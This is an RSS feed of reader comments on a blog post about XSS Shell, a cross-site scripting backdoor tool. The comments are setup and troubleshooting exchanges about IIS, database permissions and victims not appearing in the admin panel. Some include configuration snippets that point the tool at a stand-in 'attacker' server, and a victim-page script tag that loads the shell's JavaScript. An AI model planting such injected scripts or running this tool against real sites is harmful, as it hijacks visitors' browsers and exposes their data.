<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
  <title>XSS Shell, backdooring the web&#46;&#46;&#46; - Yorumlar</title>
  <description>Ferruh Mavituna - Me, Myself and My Alter Ego...</description>
  <copyright>Ferruh Mavituna</copyright>
  <link>http://ferruh.mavituna.com</link>
  <lastBuildDate>Paz, 12 Şub 2012 16:07:46 +0200</lastBuildDate>
  <image>
    <title>Ferruh Mavituna</title>
    <link>http://ferruh.mavituna.com</link>
    <url>http://ferruh.mavituna.com/rss/rss.gif</url>
  </image>
  <item>
  <title>Femisko</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Femisko</author>
  <pubDate>Cum, 06 Haz 2008 17:27:52 +0200</pubDate>
  <description>           I configured XSS Shell correctly.... But I dont seem to get the victims dropping in the Admin Panel. I get a yellow blink that is suppose to mean something... But I see nothing.... Help me please...</description>
</item>
<item>
  <title>Andy</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Andy</author>
  <pubDate>Per, 29 May 2008 18:30:42 +0200</pubDate>
  <description>           My Virtual Directory &amp;quot;xssshell&amp;quot; points to C:\xssshell&lt;br /&gt;&lt;br /&gt;There&lt;br /&gt;&lt;br /&gt;\db\sample_victim\xssshellxssshell.asp&lt;br /&gt;&lt;br /&gt;My xssshell.asp file has variables&lt;br /&gt;&lt;br /&gt;// You XSSShell Server&lt;br /&gt;var SERVER = &amp;quot;http://localhost/xssshell/&amp;quot;; &lt;br /&gt;// This file's name&lt;br /&gt;var ME = SERVER + &amp;quot;xssshell.asp?p=1&amp;lt;%=VicAdd%&amp;gt;&amp;quot; ; &lt;br /&gt;// Connector file (can be in php, cfm, pl etc. just stick with implementation)&lt;br /&gt;var CONNECTOR = SERVER + &amp;quot;xssshell/connector.asp&amp;quot;; &lt;br /&gt;// Commands file (can be in php, cfm, pl etc. just stick with implementation)&lt;br /&gt;var COMMANDS_URL = SERVER + &amp;quot;xssshell/commands.asp&amp;quot;; &lt;br /&gt;&lt;br /&gt;My C:\xssshell\xssshell\db.asp value is&lt;br /&gt;&lt;br /&gt;'// DATABASE CONFIGURATION&lt;br /&gt;Const DBPATH = &amp;quot;..\db\shell.mdb&amp;quot;&lt;br /&gt;&lt;br /&gt;My C:\xssshell\sample_victim\default.asp value is&lt;br /&gt;&lt;br /&gt;&amp;lt;script src=&amp;quot;http://localhost/XssShell/xssshell.asp?v=336699&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;C:\xssshell\ and all sub directories are not read only&lt;br /&gt;&lt;br /&gt;xssshell virtual directory and all sub directories are set to Write in IIS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I can load the admin interface OK, but when I access&lt;a href=&quot;http://localhost/XssShell/sample_victim/default.asp&quot;&gt;http://localhost/XssShell/sample_victim/default.asp&lt;/a&gt; I get debugger &lt;br /&gt;&lt;br /&gt;&amp;quot;An unhandled exception ('Operation must use an updateable query.') occurred in dllhost.exe [900].&lt;br /&gt;&lt;br /&gt;in debug, it is failing on &amp;quot;ExeNewRs.Execute&amp;quot; with query INSERT INTO Victim (IP,VictimID) VALUES (127.0.0.1,308307)</description>
</item>
<item>
  <title>n3</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>n3</author>
  <pubDate>Çar, 01 Ağu 2007 20:22:43 +0200</pubDate>
  <description>           M4D syshole.com da ufak bi d&amp;#246;k&amp;#252;man yazdim bu konula ilgili basit bi sey oldu ama kullanimi a&amp;#231;ikliyor biraz..&lt;br /&gt;ger&amp;#231;i sitenin reklamini yapmis gibi oluyor biraz ama nasil olsa ferruh bey yorumlari onaylamadan &amp;#246;nce okuyor&lt;img src=&quot;/mg/smilies/smile.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:)&quot; /&gt;&lt;br /&gt;Eger ufak bi yardim olsun isterseniz yorumlar kismina da direkt yapistirabilirim d&amp;#246;k&amp;#252;mani...&lt;br /&gt;Bu arada script olagan&amp;#252;st&amp;#252; olmus ferruh bey xss ataklarini yeniden canlandirabilecek tek seydi umarim gelismeler devam eder.</description>
</item>
<item>
  <title>M4D</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>M4D</author>
  <pubDate>Paz, 13 May 2007 20:32:53 +0200</pubDate>
  <description>            Hocam bunun T&amp;#252;rk&amp;#231;e bi d&amp;#246;k&amp;#252;manini hazirlar misiniz?  xssshell.asp yi a&amp;#231;mak istedigimde kodlar direk &amp;#231;ikiyor karsima..Asp den de anlamadigim i&amp;#231;in &amp;#231;aresiz kaliyoruz.Ki &amp;#231;ogu arkadas ta yapamamis benim gibi.daha a&amp;#231;iklayici bi d&amp;#246;k&amp;#252;man hazirlayabilir misiniz?&lt;br /&gt;&lt;br /&gt;Simdiden tesekk&amp;#252;rler!!!</description>
</item>
<item>
  <title>mark</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>mark</author>
  <pubDate>Çar, 18 Nis 2007 18:03:05 +0200</pubDate>
  <description>           merhaba  usta t&amp;#252;rk&amp;#231;e olarak daha genis bir kurulum bilgisi vere bilirmisin simdiden tesekk&amp;#252;rler </description>
</item>
<item>
  <title>executioner</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>executioner</author>
  <pubDate>Sal, 17 Nis 2007 22:26:42 +0200</pubDate>
  <description>           aga ben bunu kuramadim &amp;#231;alismiyor hep editlerde eksik yada yanlisliklar &amp;#231;ikiyor buna turk&amp;#231;e sekilde el atarmisiniz</description>
</item>
<item>
  <title>Erkin</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Erkin</author>
  <pubDate>Per, 12 Nis 2007 08:56:29 +0200</pubDate>
  <description>           Harika biseye benziyor...&lt;br /&gt;Hemen Asp Server kuruyorum:] Gercekten Professional olmus gibi...&lt;br /&gt;kodlar bunu gosteriyor&lt;br /&gt;gorusmek uzere paylasim icin saolun</description>
</item>
<item>
  <title>lost</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>lost</author>
  <pubDate>Cmt, 24 Mar 2007 22:58:41 +0200</pubDate>
  <description>           I am getting an error when running as the attacker. I am getting it's an IE and I couldn't figure out how to attach an fuction with event succesfully on my attacker page and on my iis server it brings up a debug message. any idea's? I am stuck&lt;br /&gt;</description>
</item>
<item>
  <title>chintan</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>chintan</author>
  <pubDate>Pzt, 05 Mar 2007 13:38:38 +0200</pubDate>
  <description>           Hey i have got one problem.... I have configured the xssshell well. Everything works fine..&lt;br /&gt;But i am not being able to see the zombies dropping down in my admin interface.. I have replaced the desired url with&lt;a href=&quot;http://localhost/xssshell/&quot;&gt;http://localhost/xssshell/&lt;/a&gt;  &lt;br /&gt;&lt;br /&gt;Is it correct, or do i need to supply other url?? Kindly guide me..&lt;br /&gt;I am not able to get why testing does not drop zombies in admin interface..</description>
</item>
<item>
  <title>chintan</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>chintan</author>
  <pubDate>Pzt, 05 Mar 2007 12:17:38 +0200</pubDate>
  <description>           Is there any link to english version of this site???</description>
</item>
<item>
  <title>yeLda</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>yeLda</author>
  <pubDate>Pzt, 12 Şub 2007 14:47:03 +0200</pubDate>
  <description>           eLLerinize sagLikdenemedim ama az sonra bakicam</description>
</item>
<item>
  <title>nick</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>nick</author>
  <pubDate>Cum, 26 Oca 2007 18:28:07 +0200</pubDate>
  <description>           Im guessing that u cant do this remotely?</description>
</item>
<item>
  <title>JoSuEcUaTe</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>JoSuEcUaTe</author>
  <pubDate>Çar, 24 Oca 2007 00:01:44 +0200</pubDate>
  <description>           # Tipo de error:&lt;br /&gt;Microsoft JET Database Engine (0x80004005)&lt;br /&gt;Error no especificado&lt;br /&gt;/xss/xssshell/fmlibrary/fmlibraryv3.asp, l&amp;#237;nea 193&lt;br /&gt;&lt;br /&gt;# Tipo de explorador:&lt;br /&gt;Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1&lt;br /&gt;&lt;br /&gt;# P&amp;#225;gina:&lt;br /&gt;GET /xss/xssshell/Default.asp&lt;br /&gt;</description>
</item>
<item>
  <title>JoSuEcUaTe</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>JoSuEcUaTe</author>
  <pubDate>Sal, 23 Oca 2007 22:37:00 +0200</pubDate>
  <description>           I Have this errors:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Microsoft JET Database Engine (0x80004005)&lt;br /&gt;&lt;br /&gt;/xss/xssshell/fmlibrary/fmlibraryv3.asp, line 193</description>
</item>
<item>
  <title>todi</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>todi</author>
  <pubDate>Cmt, 20 Oca 2007 02:13:50 +0200</pubDate>
  <description>           somebody cand help me help us&lt;img src=&quot;/mg/smilies/smile.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:)&quot; /&gt; make a video how to install if somebody can....</description>
</item>
<item>
  <title>todi</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>todi</author>
  <pubDate>Cmt, 20 Oca 2007 00:27:51 +0200</pubDate>
  <description>           yes i have the same problem like zidane i can see the files in the directory and not like in video demo</description>
</item>
<item>
  <title>lobas</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>lobas</author>
  <pubDate>Cmt, 13 Oca 2007 15:18:55 +0200</pubDate>
  <description>           hi i cannot get this to work, how do i setup the ms access stuff? can i not use flat file more info please the readme doesnt explain enough</description>
</item>
<item>
  <title>zidane</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>zidane</author>
  <pubDate>Sal, 19 Ara 2006 18:31:28 +0200</pubDate>
  <description>           Could some please tell me if ive done this right;&lt;br /&gt;I download a web server program (netserve webserver), and i put all the xss shell file in to a directory, i changed the server url, when i go to 127.0.0.1:81/xssshell, it just lists all the files in the directory. It doesn't show the graphical interface like in the video. What am i doing wrong?</description>
</item>
<item>
  <title>dan</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>dan</author>
  <pubDate>Çar, 06 Ara 2006 19:40:31 +0200</pubDate>
  <description>           how do you make the DB file read/write?  I always use apache, never used IIS before.  Do I just right click the 'db' folder and uncheck read-only?</description>
</item>
<item>
  <title>Sensor</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Sensor</author>
  <pubDate>Sal, 05 Ara 2006 01:31:24 +0200</pubDate>
  <description>           The script works on Windows XP Professional SP2? I've tried to make the sscript work but i don't received any ip. I have IIS installed on my Win Xp Professional. </description>
</item>
<item>
  <title>k0b3&#46;bryant08&#64;gmail&#46;com</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>k0b3&#46;bryant08&#64;gmail&#46;com</author>
  <pubDate>Çar, 29 Kas 2006 20:05:43 +0200</pubDate>
  <description>           maybe you are right, the folder name had confused me before, but i'd tried all possible configuration of setting up (even with your last comments). &lt;br /&gt;&lt;br /&gt;perhaps there is some problem with my web server (iis5), and maybe i should try on linux platform during my free time.&lt;br /&gt;&lt;br /&gt;this is first ever &amp;quot;simple&amp;quot; task that i fail to achive so far.&lt;br /&gt;&lt;br /&gt;anyway, Ferruh, thanks for your patience and attentions ..&lt;img src=&quot;/mg/smilies/grin.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:D&quot; /&gt;</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 29 Kas 2006 18:09:35 +0200</pubDate>
  <description>           &lt;blockquote&gt;syntax error&lt;br /&gt;&amp;lt;!DOCTYPE html PUBLIC &amp;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&amp;quot; &amp;quot;[w]&lt;a href=&quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&amp;quot;&amp;gt;&quot;&gt;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&amp;quot;&amp;gt;&lt;/a&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;There shouldn't be syntax error in there possibly you are getting an error from ASP. Try to checkout full response from Firebug.</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 29 Kas 2006 18:04:32 +0200</pubDate>
  <description>           I don't know why it seems so complicated. Maybe because of xssshell folder name.&lt;br /&gt;&lt;br /&gt;Put all files to webserver it's going to work change&lt;a href=&quot;http://attacker/&quot;&gt;http://attacker/&lt;/a&gt; to server address. &lt;br /&gt;&lt;br /&gt;If you don't put into root then you just need change &lt;blockquote&gt;SERVER&lt;/blockquote&gt; variable;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;// You XSSShell Server&lt;br /&gt;var SERVER = &amp;quot;http://attacker/&amp;quot;; &lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Change to;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;// You XSSShell Server&lt;br /&gt;var SERVER = &amp;quot;http://attacker/YOURFOLDERNAME/&amp;quot;; &lt;br /&gt;&lt;/blockquote&gt;</description>
</item>
<item>
  <title>k0b3&#46;bryant08&#64;gmail&#46;com</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>k0b3&#46;bryant08&#64;gmail&#46;com</author>
  <pubDate>Çar, 29 Kas 2006 16:30:18 +0200</pubDate>
  <description>           i keep getting this error when i connect to the admin shell from victim's page:&lt;br /&gt;&lt;br /&gt;syntax error&lt;br /&gt;&amp;lt;!DOCTYPE html PUBLIC &amp;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&amp;quot; &amp;quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&amp;quot;&amp;gt;&lt;br /&gt;&lt;br /&gt;in the &amp;quot;headers.asp&amp;quot; page,  can anyone helps ???&lt;br /&gt;&lt;br /&gt;thanks in advance,&lt;br /&gt;</description>
</item>
<item>
  <title>nofear0720</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>nofear0720</author>
  <pubDate>Çar, 29 Kas 2006 14:18:55 +0200</pubDate>
  <description>           i'm still not able to connect it correctly and when i test the sample_victim [http://localhost/xssshell/victim/], i got the following error :&lt;br /&gt;&lt;br /&gt;[Exception... &amp;quot;Component returned failure code: 0x80040111 (NS_ERROR_NOT_AVAILABLE) [nsIXMLHttpRequest.status]&amp;quot; nsresult: &amp;quot;0x80040111 (NS_ERROR_NOT_AVAILABLE)&amp;quot; location: &amp;quot;JS frame ::&lt;a href=&quot;http://nofear0720/xssshell/js/moo.ajax.js&quot;&gt;http://nofear0720/xssshell/js/moo.ajax.js&lt;/a&gt; :: anonymous :: line 27&amp;quot; data: no]&lt;br /&gt;&lt;br /&gt;i think my setting for xssshell.asp is no problem, but i still can't connect the the admin shell using the sample victim.&lt;br /&gt;&lt;br /&gt;any help given will be appreicated.....&lt;br /&gt;&lt;br /&gt;thanks in advance,</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 29 Kas 2006 13:20:56 +0200</pubDate>
  <description>           &lt;blockquote&gt;what make me confuse is that in the &amp;quot;xssshell.asp&amp;quot;, under the variable &amp;quot;SERVER&amp;quot;, i need to set it to, say i create a virtual server to the &amp;quot;xssshell&amp;quot; folder (not &amp;quot;xssshell&amp;quot; directory ...&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;If you mean &amp;quot;virtual directory&amp;quot; which, it's same and you can use it just like normal folder. So if you open xssshell virtual folder yes it will be translate into&lt;a href=&quot;http://localhost/xssshell/xssshell.asp&quot;&gt;http://localhost/xssshell/xssshell.asp&lt;/a&gt; and your commands.asp will be in&lt;a href=&quot;http://localhost/xssshell/xssshell/commands.asp&quot;&gt;http://localhost/xssshell/xssshell/commands.asp&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;It should work well.&lt;br /&gt;&lt;br /&gt;If you mean virtual host, this is invisible to application so it should just work again.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Second issue,&lt;br /&gt;&lt;blockquote&gt;i got this error &amp;quot;$A is not defined&amp;quot; in prototype.js when accessing the xssshell.asp&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Unfortunately this is one of the stupid errors from 3rd party AJAX libraries. Just ignore it. It shouldn't affect anything. But check for request responses in Firebug if there is an ASP error in there, that would be the reason.&lt;br /&gt;</description>
</item>
<item>
  <title>nofear0720</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>nofear0720</author>
  <pubDate>Çar, 29 Kas 2006 13:20:17 +0200</pubDate>
  <description>           in &amp;quot;xssshell.asp&amp;quot; if i set the SERVER to the &amp;quot;http://myhost/xssshell/&amp;quot; where my xssshell:&lt;br /&gt;&lt;br /&gt;  xssshellv039----------&lt;br /&gt;                                    |&lt;br /&gt;                                    -----xssshell&lt;br /&gt;                                    |&lt;br /&gt;                                    -----db&lt;br /&gt;                                    |&lt;br /&gt;                                    -----sample_victim&lt;br /&gt;                                    |&lt;br /&gt;                                    -----xssshell.asp&lt;br /&gt;then, by default the variables for CONNECTOR &amp;amp; COMMANDS_URL would be &amp;quot;http://myhost/xssshell/xssshell/connectors.asp&amp;quot; and &amp;quot;http://myhost/xssshell/xssshell/commands.asp&amp;quot;.  isn't it this is invalid url ??&lt;br /&gt;&lt;br /&gt;i know i can set the variables for CONNECTOR &amp;amp; COMMANDS_URL by removing the prefix &amp;quot;xssshell&amp;quot;, but anyone can explain how to set it correctly n wat value should i set for the SERVER assuming i setup the virtual server to &amp;quot;xssshell&amp;quot; folder and not the &amp;quot;xssshellv039&amp;quot; ???&lt;br /&gt;&lt;br /&gt;i spend ald a day for setting up this, i can only see the XSS Shell admin but the testing victim always failed&lt;img src=&quot;/mg/smilies/sad.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:(&quot; /&gt;&lt;br /&gt;&lt;br /&gt;thanks in advance,</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 29 Kas 2006 13:16:44 +0200</pubDate>
  <description>           Here are core variables. If you want you can just hardcode them instead of useing SERVER variable.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;SERVER&lt;/strong&gt;&lt;br /&gt;Server is your xssshell URL which is goes like&lt;a href=&quot;http://www.yoursite.com&quot;&gt;http://www.yoursite.com&lt;/a&gt; style&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;ME&lt;/strong&gt;&lt;br /&gt;xssshell.asp full URL. This should point to your xssshell.asp file. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;CONNECTOR&lt;/strong&gt;&lt;br /&gt;This should point to your connector listener, connector.asp (by default connector is under xssshell folder)&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;COMMANDS_URL&lt;/strong&gt;&lt;br /&gt;This should point to your commands pusher, commands.asp (by default connector is under xssshell folder)&lt;br /&gt;</description>
</item>
<item>
  <title></title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author></author>
  <pubDate>Çar, 29 Kas 2006 12:37:58 +0200</pubDate>
  <description>           i got this error &amp;quot;$A is not defined&amp;quot; in prototype.js when accessing the xssshell.asp&lt;br /&gt;&lt;br /&gt;regards,</description>
</item>
<item>
  <title></title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author></author>
  <pubDate>Çar, 29 Kas 2006 12:35:58 +0200</pubDate>
  <description>           what make me confuse is that in the &amp;quot;xssshell.asp&amp;quot;, under the variable &amp;quot;SERVER&amp;quot;, i need to set it to, say i create a virtual server to the &amp;quot;xssshell&amp;quot; folder (not &amp;quot;xssshell&amp;quot; directory that includes the &amp;quot;db&amp;quot;, &amp;quot;sample_victim&amp;quot; folders ???),  &amp;quot;http://myhost/xssshell&amp;quot;, and the value for the variable &amp;quot;ME&amp;quot; is set by SERVER + &amp;quot;xssshell.asp?p=1&amp;lt;%=vicAdd%&amp;gt;&amp;quot; which give the value of ME as &amp;quot;http://myhost/xssshell/xssshell.asp?p=1&amp;lt;%=visAdd%&amp;gt;&amp;quot;. How can the &amp;quot;xssshell.asp&amp;quot; exists in the &amp;quot;xssshell&amp;quot; folder or do we need to copy it to &amp;quot;xssshell&amp;quot; folder?? By default setting, same thing happens to the variables CONNECTOR and COMMANDS_URL which both have the value &amp;quot;http://myhost/xssshell/xssshell/connector.asp&amp;quot; and &amp;quot;http://myhost/xssshell/xssshell/commands.asp&amp;quot; respectively.&lt;br /&gt;&lt;br /&gt;i still not able to set it correctly, anyone can help ??&lt;br /&gt;&lt;br /&gt;thanks in advance,</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Sal, 28 Kas 2006 19:01:34 +0200</pubDate>
  <description>           Installition and Setup Checklist,&lt;br /&gt;&lt;br /&gt;- Do steps in readme.txt to setup&lt;br /&gt;- Check database permissions&lt;br /&gt;- Check paths&lt;br /&gt;- Check IP Addresses&lt;br /&gt;- Server should support ASP&lt;br /&gt;- ASP files are working by making requests to them from browser&lt;br /&gt;- Don't use free webservers which are adding extra HTML code (this will break XSS Shell because of JS errors)&lt;br /&gt;- Open DEBUG from xssshell.asp to see what's going on and what's the problem.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Still you got a problem?&lt;/strong&gt;&lt;br /&gt;- Install Firebug extension for Firefox and check repsonses for server-side errors and check Javascript errors.&lt;br /&gt;&lt;br /&gt;You can send me these errors if you can't figure out.&lt;br /&gt;&lt;br /&gt;</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Cum, 10 Kas 2006 10:11:50 +0200</pubDate>
  <description>           Demo (&lt;em&gt;they are lurking&lt;/em&gt;)&lt;br /&gt;-&lt;a href=&quot;http://ferruh.mavituna.com/xssshell/demo/&quot;&gt;http://ferruh.mavituna.com/xssshell/demo/&lt;/a&gt;&lt;br /&gt;-&lt;a href=&quot;http://ferruh.mavituna.com/xssshell/demo/wide/&quot;&gt;http://ferruh.mavituna.com/xssshell/demo/wide/&lt;/a&gt;</description>
</item>
<item>
  <title>Demo</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Demo</author>
  <pubDate>Cum, 10 Kas 2006 07:49:26 +0200</pubDate>
  <description>           Where did the great demo go to?!</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 08 Kas 2006 12:28:56 +0200</pubDate>
  <description>           Not xssshell.js should be &lt;strong&gt;&lt;a href=&quot;http://attacker:81/xssshell.asp&quot;&gt;http://attacker:81/xssshell.asp&lt;/a&gt; &lt;/strong&gt;</description>
</item>
<item>
  <title>help</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>help</author>
  <pubDate>Çar, 08 Kas 2006 11:16:10 +0200</pubDate>
  <description>           in readme.txt :&lt;br /&gt;Now open your admin interface from your browser,&lt;br /&gt;To test it, just modify &amp;quot;sample_victim/default.asp&amp;quot; source code and replace &amp;quot;http://attacker:81/release/xssshell.js&amp;quot; URL with your own XSS Shell URL. Open &amp;quot;sample_victim&amp;quot; folder in some other browser and may be upload in to some other server.&lt;br /&gt;&lt;br /&gt;q:&lt;br /&gt;i can't see any &amp;quot;http://attacker:81/release/xssshell.js&amp;quot; in &amp;quot;sample_victim/default.asp&amp;quot; source code</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 08 Kas 2006 10:08:35 +0200</pubDate>
  <description>           In debug screen you should see a request to commands.asp. URL is correct? Db folder has write permissions? Copy that URL and try it, is it working? Should be related with that.</description>
</item>
<item>
  <title>RE&#58; xssshell</title>
  <link>http://ferruh.mavituna.com/xss-shell-backdooring-the-web-oku/</link>
  <author>RE&#58; xssshell</author>
  <pubDate>Sal, 07 Kas 2006 20:43:41 +0200</pubDate>
  <description>           I downloaded it and set it up following the directions in the readme. The promblem I am having is that with debugging on I can see the client connect in the debugger but it never shows up in the admin panel as a victim. </description>
</item>

</channel>
</rss>
